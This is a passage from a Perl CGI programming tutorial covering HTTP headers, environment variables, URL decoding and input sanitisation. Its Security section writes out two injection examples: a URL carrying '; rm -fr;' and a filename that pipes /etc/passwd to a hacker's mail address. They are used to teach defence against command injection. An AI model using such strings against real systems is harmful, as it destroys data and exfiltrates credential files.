<TR><TD WIDTH=166>Text</TD><TD WIDTH=238>Content-Type: text/plain
</TD></TR>
<TR><TD WIDTH=166>HTML page</TD><TD WIDTH=238>Content-Type: text/html
</TD></TR>
<TR><TD WIDTH=166>GIF graphic</TD><TD WIDTH=238>Content-Type: image/gif
</TD></TR>
<TR><TD WIDTH=166>Redirection to another Web page</TD><TD WIDTH=238>Location: http://www.foobar.com
</TD></TR>
<TR><TD WIDTH=166>Cookie</TD><TD WIDTH=238>Set-cookie: ...</TD>
</TR>
<TR><TD WIDTH=166>Error Message</TD><TD WIDTH=238>Status: 402
</TD></TR>
</TABLE>
</CENTER>
<P>
<P>
The HTTP headers that your script prints must be followed by a blank
line, which marks the end of the headers. Use the following
line of code as a template:
<BLOCKQUOTE>
<PRE>
print("Content-Type: text/html\n\n");
</PRE>
</BLOCKQUOTE>
<P>
Notice that the HTTP header is followed by <I>two</I> newline
characters. This is very important. It ensures that a blank line
will always follow the HTTP header.
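<P>
One way to make sure the blank line is never forgotten is to build the header in a small helper. The following is only a sketch: the name <TT>httpHeader()</TT> is made up for this illustration and is not part of Perl or of any CGI library.

```perl
use strict;
use warnings;

# Hypothetical helper: build a Content-Type header followed by the
# blank line that ends the HTTP headers.
sub httpHeader {
    my $mimeType = shift;
    $mimeType = 'text/html' unless defined $mimeType;   # assumed default
    return "Content-Type: $mimeType\n\n";
}

# The header goes out first, then the document itself.
print httpHeader('text/html');
print "<HTML><BODY><P>Hello from CGI.</P></BODY></HTML>\n";
```

Everything printed after the header is treated by the browser as the body of the response.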
<P>
If you have installed any helper applications for Netscape or
are familiar with MIME types, you already recognize the <TT>text/plain</TT>
and <TT>text/html</TT> parts of the
<TT>Content-Type</TT> header. They
tell the remote Web browser what type of information you are sending.
The two most common MIME types to use are <TT>text/plain</TT>
and <TT>text/html</TT>.
<P>
The <TT>Location</TT> header is used
to redirect the client Web browser to another Web page. For example,
let's say that your CGI script is designed to randomly choose
from among 10 different URLs in order to determine the next Web
page to display. Once the new Web page is chosen, your program
outputs it like this:
<BLOCKQUOTE>
<PRE>
print("Location: $nextPage\n\n");
</PRE>
</BLOCKQUOTE>
<P>
Once the <TT>Location</TT> header
has been printed, nothing else should be printed. That is all
the information that the client Web browser needs.
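<P>
The random choice described above might be sketched as follows. The three URLs and the <TT>chooseRandom()</TT> function are placeholders invented for this example; substitute your own list of pages.

```perl
use strict;
use warnings;

# Placeholder URLs for illustration only.
my @pages = (
    'http://www.foobar.com/one.htm',
    'http://www.foobar.com/two.htm',
    'http://www.foobar.com/three.htm',
);

# Hypothetical helper: return one element of the list, chosen at random.
sub chooseRandom {
    my @choices = @_;
    return $choices[ int(rand(scalar @choices)) ];
}

my $nextPage = chooseRandom(@pages);

# The Location header, plus the blank line, is the entire response.
print("Location: $nextPage\n\n");
```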
<P>
Cookies and the <TT>Set-cookie:</TT>
header are discussed in the "Cookies" section later
in this chapter.
<P>
The last type of HTTP header is the <TT>Status</TT>
header. This header should be sent when an error arises in your
script that your program is not equipped to handle. I feel that
this HTTP header should not be used unless you are under severe
time pressure to complete a project. You should try to create
your own error handling routines that display a full Web page
that explains the error that happened and what the user can do
to fix or circumvent it. You might include the time, date, type
of error, contact names and phone numbers, and any other information
that might be useful to the user. Relying on the standard error
messages of the Web server and browser will make your Web site
less user friendly.
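<P>
A home-grown error page along these lines could be as simple as the sketch below. The <TT>errorPage()</TT> function and the contact text are assumptions made for the example, and the two arguments are assumed to be fixed strings written by you, not text supplied by the visitor.

```perl
use strict;
use warnings;

# Hypothetical helper: build a complete HTML error page, header included.
# $errorType and $advice are assumed to be trusted, fixed strings.
sub errorPage {
    my ($errorType, $advice) = @_;
    my $when = localtime();    # date and time as a readable string

    return "Content-Type: text/html\n\n"
         . "<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY>\n"
         . "<H1>$errorType</H1>\n"
         . "<P>Time: $when</P>\n"
         . "<P>$advice</P>\n"
         . "<P>Contact: the site administrator</P>\n"    # placeholder contact
         . "</BODY></HTML>\n";
}

print errorPage('Data file unavailable',
                'Please try again in a few minutes.');
```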
<H2><A NAME="CGIandEnvironmentVariables"><FONT SIZE=5 COLOR=#FF0000>
CGI and Environment Variables</FONT></A></H2>
<P>
You are already familiar with environment variables if you read
<A HREF="ch12.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch12.htm" >Chapter 12</A>, "Using Special Variables." When your CGI
program is started, the Web server creates and initializes a number
of environment variables that your program can access using the
<TT>%ENV</TT> hash.
<P>
Table 19.2 contains a short description of each environment variable.
A complete description of the environment variables used in
CGI programs can be found at
<BLOCKQUOTE>
<PRE>
http://www.ast.cam.ac.uk/~drtr/cgi-spec.html
<BR>
</PRE>
</BLOCKQUOTE>
<P>
<CENTER><B>Table 19.2 CGI Environment Variables</B></CENTER>
<p>
<CENTER>
<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>
<TR><TD WIDTH=199><I>Variable Name</I></TD><TD WIDTH=391><I>Description</I>
</TD></TR>
<TR><TD WIDTH=199>AUTH_TYPE</TD><TD WIDTH=391>Optionally provides the authentication protocol used to access your script if the local Web server supports authentication and if authentication was used to access your script.
</TD></TR>
<TR><TD WIDTH=199>CONTENT_LENGTH</TD><TD WIDTH=391>Optionally provides the length, in bytes, of the content provided to the script through the <TT>STDIN </TT>file handle. Used particularly in the <TT>POST</TT> method of form processing. See <A
HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, "Form Processing," for more information.
</TD></TR>
<TR><TD WIDTH=199>CONTENT_TYPE</TD><TD WIDTH=391>Optionally provides the type of content available from the <TT>STDIN</TT> file handle. This is used for the <TT>POST</TT> method of form processing. Most of the time, this variable will be blank and you can
assume a value of <TT>application/octet-stream</TT>.
</TD></TR>
<TR><TD WIDTH=199>GATEWAY_INTERFACE</TD><TD WIDTH=391>Provides the version of CGI supported by the local Web server. Most of the time, this will be equal to <TT>CGI/1.1</TT>.
</TD></TR>
<TR><TD WIDTH=199>HTTP_ACCEPT</TD><TD WIDTH=391>Provides a comma-separated list of MIME types the browser software will accept. You might check this environment variable to see if the client will accept a certain kind of graphic file.
</TD></TR>
<TR><TD WIDTH=199>HTTP_FROM</TD><TD WIDTH=391>Provides the user's e-mail address. Not all Web browsers will supply this information to your server. Therefore, use this field only to provide a default value for an HTML form.
</TD></TR>
<TR><TD WIDTH=199>HTTP_USER_AGENT</TD><TD WIDTH=391>Provides the type and version of the user's Web browser. For example, the Netscape Web browser is called Mozilla.
</TD></TR>
<TR><TD WIDTH=199>PATH_INFO</TD><TD WIDTH=391>Optionally contains any extra path information from the HTTP request that invoked the script.
</TD></TR>
<TR><TD WIDTH=199>PATH_TRANSLATED</TD><TD WIDTH=391>Optionally contains the extra path information from PATH_INFO, mapped from a virtual path (i.e., relative to the root of the server directory) to the corresponding physical path on the server.
</TD></TR>
<TR><TD WIDTH=199>QUERY_STRING</TD><TD WIDTH=391>Optionally contains form information when the GET method of form processing is used. QUERY_STRING is also used for passing information such as search keywords to CGI scripts.
</TD></TR>
<TR><TD WIDTH=199>REMOTE_ADDR</TD><TD WIDTH=391>Contains the dotted decimal address of the user.
</TD></TR>
<TR><TD WIDTH=199>REMOTE_HOST</TD><TD WIDTH=391>Optionally provides the domain name for the site that the user has connected from.
</TD></TR>
<TR><TD WIDTH=199>REMOTE_IDENT</TD><TD WIDTH=391>Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow.
</TD></TR>
<TR><TD WIDTH=199>REMOTE_USER</TD><TD WIDTH=391>Optionally provides the name used by the user to access your secured script.
</TD></TR>
<TR><TD WIDTH=199>REQUEST_METHOD</TD><TD WIDTH=391>Usually contains either "GET" or "POST", the method by which form information will be made available to your script. See <A HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, "Form Processing,"
for more information.
</TD></TR>
<TR><TD WIDTH=199>SCRIPT_NAME</TD><TD WIDTH=391>Contains the virtual path to the script.
</TD></TR>
<TR><TD WIDTH=199>SERVER_NAME</TD><TD WIDTH=391>Contains the configured hostname for the server.
</TD></TR>
<TR><TD WIDTH=199>SERVER_PORT</TD><TD WIDTH=391>Contains the port number that the local Web server software is listening on. The standard port number is 80.
</TD></TR>
<TR><TD WIDTH=199>SERVER_PROTOCOL</TD><TD WIDTH=391>Contains the version of the Web protocol this server uses. For example, <TT>HTTP/1.0</TT>.
</TD></TR>
<TR><TD WIDTH=199>SERVER_SOFTWARE</TD><TD WIDTH=391>Contains the name and version of the Web server software. For example, <TT>WebSite/1.1e</TT>.
</TD></TR>
</TABLE>
</CENTER>
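<P>
To see which of these variables your own server sets, a short script can read them from the <TT>%ENV</TT> hash and print them. The sketch below assumes nothing beyond the variable names in Table 19.2; the <TT>describeEnv()</TT> function is a name made up for the example.

```perl
use strict;
use warnings;

# Hypothetical helper: format the named environment variables as plain
# text, one per line. Variables the server did not set are shown as
# "(not set)".
sub describeEnv {
    my @names = @_;
    my $text = '';
    foreach my $name (@names) {
        my $value = defined $ENV{$name} ? $ENV{$name} : '(not set)';
        $text .= "$name = $value\n";
    }
    return $text;
}

print "Content-Type: text/plain\n\n";
print describeEnv(qw(REQUEST_METHOD QUERY_STRING PATH_INFO
                     REMOTE_ADDR HTTP_USER_AGENT SERVER_NAME));
```

Run from the command line instead of through a Web server, most of the variables will be reported as not set.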
<P>
<H2><A NAME="URLENCoding"><FONT SIZE=5 COLOR=#FF0000>
URL Encoding</FONT></A></H2>
<P>
One of the limitations that the WWW organizations have placed
on the HTTP protocol is that the content of the commands, responses,
and data that are passed between client and server should be clearly
defined. It is sometimes difficult to tell simply from the context
whether a space character is a field delimiter or an actual space
character to add whitespace between two words.
<P>
To clear up the ambiguity, the URL encoding scheme was created.
Any spaces are converted into plus (<TT>+</TT>)
signs to avoid semantic ambiguities. In addition, special characters
or 8-bit values are converted into their hexadecimal equivalents
and prefaced with a percent sign (<TT>%</TT>).
For example, the string <TT>Davy Jones &lt;dj@planet.net&gt;</TT>
is encoded as <TT>Davy+Jones+%3Cdj@planet.net%3E</TT>.
If you look closely, you see that the <TT>&lt;</TT>
character has been converted to <TT>%3C</TT>
and the <TT>&gt;</TT> character has
been converted to <TT>%3E</TT>.
<P>
Your CGI script will need to be able to convert URL-encoded information
back into its normal form. Fortunately, Listing 19.2 contains
a function that will decode URL-encoded strings.
<P>
<IMG SRC="pseudo.gif" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/pseudo.gif" BORDER=1 ALIGN=RIGHT><p>
<BLOCKQUOTE>
<I>Define the </I><TT><I>decodeURL()</I></TT><I>
function.<BR>
Get the encoded string from the parameter array.<BR>
Translate all plus signs into spaces.<BR>
Convert characters coded as hexadecimal digits into regular characters.
<BR>
Return the decoded string.</I>
</BLOCKQUOTE>
<HR>
<BLOCKQUOTE>
<B>Listing 19.2 19LST02.PL-How to Decode the URL Encoding
<BR>
</B>
</BLOCKQUOTE>
<BLOCKQUOTE>
<PRE>
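sub decodeURL {
    local $_ = shift;    # work on a private copy of the argument
    tr/+/ /;             # plus signs become spaces
    # each %XX pair of hex digits becomes the byte it stands for
    s/%([0-9A-Fa-f]{2})/pack('C', hex($1))/eg;
    return($_);
}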
</PRE>
</BLOCKQUOTE>
<HR>
<P>
This function will be used in <A HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, "Form Processing,"
to decode form information. It is presented here because canned
queries also use URL encoding.
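<P>
Going the other way is just as short. The <TT>encodeURL()</TT> function below is a hypothetical counterpart written for this illustration, not something from the listings. It is stricter than the example string shown earlier and also encodes the <TT>@</TT> character, and it assumes the input is a string of 8-bit characters. A copy of the decoding routine is included so the round trip can be run as is.

```perl
use strict;
use warnings;

# Hypothetical counterpart to decodeURL(): every character except
# letters, digits, underscore, period, hyphen, and space becomes %XX.
# Spaces are left alone by the substitution and then turned into plus signs.
sub encodeURL {
    my $str = shift;
    $str =~ s/([^A-Za-z0-9_.\- ])/sprintf('%%%02X', ord($1))/eg;
    $str =~ tr/ /+/;
    return $str;
}

# Decoder in the style of Listing 19.2, repeated so this example stands alone.
sub decodeURL {
    my $str = shift;
    $str =~ tr/+/ /;
    $str =~ s/%([0-9A-Fa-f]{2})/pack('C', hex($1))/eg;
    return $str;
}

my $original = 'Davy Jones <dj@planet.net>';
my $encoded  = encodeURL($original);

print "$encoded\n";                  # Davy+Jones+%3Cdj%40planet.net%3E
print decodeURL($encoded), "\n";     # Davy Jones <dj@planet.net>
```

Note that a literal plus sign in the input is encoded as <TT>%2B</TT>, so it is not mistaken for a space when the string is decoded.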
<H2><A NAME="Security"><FONT SIZE=5 COLOR=#FF0000>
Security</FONT></A></H2>
<P>
CGI really has only one large security hole that I can see. If
you pass information that came from a remote site to an operating
system command, you are asking for trouble. I think an example
is needed to understand the problem because it is not obvious.
<P>
Suppose that you had a CGI script that formatted a directory listing
and generated a Web page that let visitors view the listing. In
addition, let's say that the name of the directory to display
was passed to your program using the <TT>PATH_INFO</TT>
environment variable. The following URL could be used to call
your program:
<BLOCKQUOTE>
<PRE>
http://www.foo.com/cgi-bin/dirlist.pl/docs
</PRE>
</BLOCKQUOTE>
<P>
Inside your program, the <TT>PATH_INFO</TT>
environment variable is set to <TT>/docs</TT>.
In order to get the directory listing, all that is needed is a
call to the <TT>ls</TT> command in
UNIX or the <TT>dir</TT> command in
DOS. Everything looks good, right?
<P>
But what if the program was invoked with this URL?
<BLOCKQUOTE>
<PRE>
http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;
</PRE>
</BLOCKQUOTE>
<P>
Now, all of a sudden, you are faced with the possibility of files
being deleted because the semicolon (;) lets multiple commands
be executed on one command line.
<P>
This same type of security hole is possible any time you try to
run an external command. You might be tempted to use the <TT>mail</TT>,
<TT>sendmail</TT>, or <TT>grep</TT>
commands to save time while writing your CGI program, but because
all of these programs are easily duplicated using Perl, try to
resist the temptation.
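<P>
As an illustration of duplicating an external command in Perl, the directory listing can be produced with <TT>opendir</TT> and <TT>readdir</TT> instead of <TT>ls</TT> or <TT>dir</TT>. This is only a sketch: the <TT>listDirectory()</TT> name is invented for the example, and it does not decide which directories a visitor should be allowed to see, so a real script would still need to restrict that.

```perl
use strict;
use warnings;

# Hypothetical helper: return the sorted names in a directory without
# running "ls" or "dir". No shell is involved, so characters such as ";"
# have no special meaning.
sub listDirectory {
    my $dir = shift;
    opendir(my $dh, $dir) or return;    # nothing is returned if it cannot be opened
    my @names = sort grep { $_ ne '.' && $_ ne '..' } readdir($dh);
    closedir($dh);
    return @names;
}

print "$_\n" foreach listDirectory('.');
```

If the visitor supplies something like <TT>; rm -fr;</TT>, the call to <TT>opendir</TT> simply fails because no directory has that name.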
<P>
Another security hole is related to using external data to open
or create files. Some enterprising hacker could use <TT>"|
mail hacker@hacker.com < /etc/passwd"</TT> as the
filename to mail your password file or any other file to himself.
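<P>
One defense against this trick, available in Perl 5.6 and later, is the three-argument form of <TT>open</TT>, which keeps the mode separate from the filename. The sketch below uses a made-up function name, <TT>readFileSafely()</TT>, and shows only the reading case.

```perl
use strict;
use warnings;

# Hypothetical helper: read a whole file using three-argument open().
# Because the mode '<' is given separately, the name is only ever treated
# as a file to read; a "|" in the name cannot start a command.
sub readFileSafely {
    my $name = shift;
    open(my $fh, '<', $name) or return;    # undef if the file cannot be opened
    local $/;                              # slurp mode: read everything at once
    my $content = <$fh>;
    close($fh);
    return $content;
}

my $text = readFileSafely('| mail hacker@hacker.com < /etc/passwd');
print defined $text ? "opened\n" : "refused: no file by that name\n";
```

This protects only against the pipe trick. It does not stop a visitor from naming a real file that you would rather keep private, so the name still needs to be checked.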
<P>
All of these security holes can be avoided by removing the dangerous
characters (like the | or pipe character).
<P>
<IMG SRC="pseudo.gif" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/pseudo.gif" BORDER=1 ALIGN=RIGHT><p>
<BLOCKQUOTE>
<I>Define the </I><TT><I>improveSecurity()</I></TT><I>
function.<BR>
Copy the passed string into </I><TT><I>$_</I></TT><I>,
the default search space.<BR>
Protect against command-line options by removing the first run of </I><TT><I>-</I></TT><I>
characters.
<BR>
Additional protection against command-line options.<BR>
Convert all dangerous characters into harmless underscores.<BR>
Return the </I><TT><I>$_</I></TT><I>
variable.</I>
</BLOCKQUOTE>
<P>
Listing 19.3 shows how to remove dangerous characters.
<HR>
<BLOCKQUOTE>
<B>Listing 19.3 19LST03.PL-How to Remove Dangerous
Characters<BR>
</B>
</BLOCKQUOTE>
<BLOCKQUOTE>
<PRE>
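sub improveSecurity {
    local $_ = shift;             # work on a private copy of the argument
    s/\-+(.*)/$1/g;               # remove the first run of hyphens on each line
    s/(.*)[ \t]+\-(.*)/$1$2/g;    # remove a hyphen that follows whitespace
    tr/\$\'\`\"\<\>\/\;\!\|/_/;   # dangerous characters become underscores
    return($_);
}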
</PRE>
</BLOCKQUOTE>
<HR>
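<P>
A complementary approach is to accept only characters you know to be safe and reject everything else, instead of trying to list every dangerous character. The sketch below is my own illustration of that idea; the <TT>isSafeName()</TT> function and its list of allowed characters are assumptions that you would adjust for your own script.

```perl
use strict;
use warnings;

# Hypothetical check: accept a name only if every character is a letter,
# digit, underscore, period, or hyphen. Anything else is rejected.
sub isSafeName {
    my $name = shift;
    return 0 unless defined $name && length $name;
    return 0 if $name =~ /^-/;      # would look like a command-line option
    return 0 if $name =~ /\.\./;    # would climb out of the directory
    return $name =~ /^[A-Za-z0-9_.\-]+\z/ ? 1 : 0;
}

foreach my $candidate ('docs', '; rm -fr;', '-rf', '../etc') {
    printf "%-12s %s\n", $candidate,
        isSafeName($candidate) ? 'accepted' : 'rejected';
}
```

Of the four sample names, only <TT>docs</TT> is accepted.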
<H2><A NAME="CGIwrapandSecurity"><FONT SIZE=5 COLOR=#FF0000>
CGIwrap and Security</FONT></A></H2>
<P>
CGIwrap (<B>http://wwwcgi.umr.edu/~cgiwrap/</B>) is a UNIX-based
utility written by Nathan Neulinger that lets general users run
CGI scripts without needing access to the server's <TT>cgi-bin</TT>
directory. Normally, all scripts must be located in the server's
main <TT>cgi-bin</TT> directory and
all run with the same UID (user ID) as the Web server. CGIwrap
performs various security checks on the scripts before changing
ID to match the owner of the script. All scripts are executed
with the same user ID as the user who owns them. CGIwrap works
with NCSA, Apache, CERN, Netsite, and probably any other UNIX
Web server.
<P>
Any files created by a CGI program are normally owned by the Web
server. This can cause a problem if you need to edit or remove
files created by CGI programs. You might have to ask the system
administrator for help because you lack the proper authorization.
All CGI programs have the same system permissions as the Web server.
If you run your Web server under the root user ID (being either
very brave or very foolish), a CGI program could be tricked into
erasing the entire hard drive. CGIwrap provides a way around these
problems.
<P>
With CGIwrap, scripts are located in users' <TT>public_html/cgi-bin</TT>